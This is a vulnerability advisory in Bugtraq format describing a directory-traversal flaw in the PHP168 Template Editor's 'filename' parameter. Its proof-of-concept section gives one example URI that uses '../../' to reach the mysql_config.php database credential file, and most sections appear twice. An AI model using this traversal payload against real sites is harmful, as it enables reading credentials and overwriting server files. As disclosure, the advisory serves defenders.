PHP168 Template Editor 'filename' Parameter Directory Traversal Vulnerability
BID:42174
Info
PHP168 Template Editor 'filename' Parameter Directory Traversal Vulnerability
| Bugtraq ID: | 42174 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 04 2009 12:00AM |
| Updated: | Oct 04 2009 12:00AM |
| Credit: | esnra |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
PHP168 Template Editor 'filename' Parameter Directory Traversal Vulnerability
PHP168 Template Editor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to read and overwrite arbitrary files in the context of the webserver. This may aid in further attacks
PHP168 Template Editor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to read and overwrite arbitrary files in the context of the webserver. This may aid in further attacks
Exploit / POC
PHP168 Template Editor 'filename' Parameter Directory Traversal Vulnerability
An attacker can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/background catalog/index.php?Lfj =style& job=ditcode&keywords=default& filename =../../ php168/mysql_config.php
An attacker can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/background catalog/index.php?Lfj =style& job=ditcode&keywords=default& filename =../../ php168/mysql_config.php
Solution / Fix
PHP168 Template Editor 'filename' Parameter Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP168 Template Editor 'filename' Parameter Directory Traversal Vulnerability
References:
References:
- Vendor Homepage (PHP168)